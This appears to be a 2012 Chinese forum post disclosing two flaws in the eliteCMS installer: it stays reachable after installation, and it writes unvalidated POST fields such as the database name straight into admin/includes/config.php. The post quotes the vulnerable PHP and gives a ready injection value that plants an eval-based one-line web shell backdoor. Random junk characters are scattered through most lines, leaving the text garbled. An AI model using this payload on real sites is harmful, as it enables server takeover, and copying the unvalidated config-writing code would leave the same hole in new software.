eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装0 {6 E: A5 Z/ u$ \. \, d
6 L$ a6 _5 w- O, n
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
: X' n( n! j* U$ m9 r7 _; y我们来看代码:4 ~: \$ a! m5 W/ q; q
. X4 W; H$ v9 A/ t. }...
5 Z+ F1 z6 s' T8 Relseif ($_GET['step'] == "4") {
$ z& A3 @% Q1 a $file = "../admin/includes/config.php";0 j n! q5 Y4 `7 X6 r0 r& K% E0 I
$write = "<?php\n";
& _' U: U! g, J, B1 V0 A $write .= "/**\n";
3 G5 o* H* F& d2 O# j% ]9 N, j $write .= "*\n";: n" b6 Y* D. ]' g" t2 Q
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
/ n- q' d4 \4 Y. x L9 z6 b...略...
4 p' R+ y" J! v7 C2 W $write .= "*\n";
( n1 R1 I( B, F $write .= "*/\n";8 y( P; W. B& Y9 V, {- J# q
$write .= "\n";. X0 \7 G: V* S! I: q
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
3 s) Z* G- a5 ^/ u, M $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
7 y, \2 b- u7 C2 A) F $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";/ E3 Q' M0 b+ M% r7 a! A
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";2 T3 n/ T% ?& u% k
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
9 ]2 ^+ ^* s+ g h4 H: q! Y( P $write .= "if (!\$connection) {\n";$ h. P7 e* E& J; Q
$write .= " die(\"Database connection failed\" .mysql_error());\n";* o$ \2 o9 r* B5 G' a
$write .= " \n";: c; }5 c( W) c; ^# e/ v/ @
$write .= "} \n";% K7 d; F C; {* q @6 M2 P' X
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";8 W1 v7 S+ n) P) O3 U8 @
$write .= "if (!\$db_select) {\n";8 l: \& K+ Z6 R- g: |& E1 G
$write .= " die(\"Database select failed\" .mysql_error());\n";% W* V7 [1 J% P5 E- }. W
$write .= " \n";
9 e4 f; G7 u( ~! j8 T $write .= "} \n";
5 _4 F+ B% G2 s6 F; q& Q $write .= "?>\n";
* P# R7 c6 h' t/ e ( H2 O2 I+ U' x6 ^
$writer = fopen($file, 'w');
% L4 P; j7 [ W...6 v3 f) b+ U X, B
& B4 l. M" K6 V2 B/ P. s
在看代码:
+ e& |# a" b6 E7 Q: Q 1 g0 W! X: _* v
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
) {+ x1 I0 g, z6 i# @" S$_SESSION['DB_NAME'] = $_POST['DB_NAME'];$ N4 D5 r+ S( J5 l7 e% m- y
$_SESSION['DB_USER'] = $_POST['DB_USER'];
- M. R U% c8 \+ M; T$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
/ G* Y; d2 s" b% c: q3 q; B. i4 Y * B6 q1 V6 E7 X2 h$ T2 U* T% v
取值未作任何验证( w. f- j: I$ a/ T. T$ w' S
如果将数据库名POST数据:
. b8 c' }* W6 U" r1 f. K% P6 S! ^' A ' O- v$ w$ Q, Q* S( |9 S/ Z5 W
"?><?php eval($_POST[c]);?><?php
& W Z' \# Z& y6 x$ f+ [4 B( w: X 1 b3 j" _. Z* n- e7 g, z3 p
将导致一句话后门写入/admin/includes/config.php5 q% ^1 |0 r1 t$ Z$ j: r% K2 z
|
发表于 2012-11-18 13:59:27
收藏
支持
反对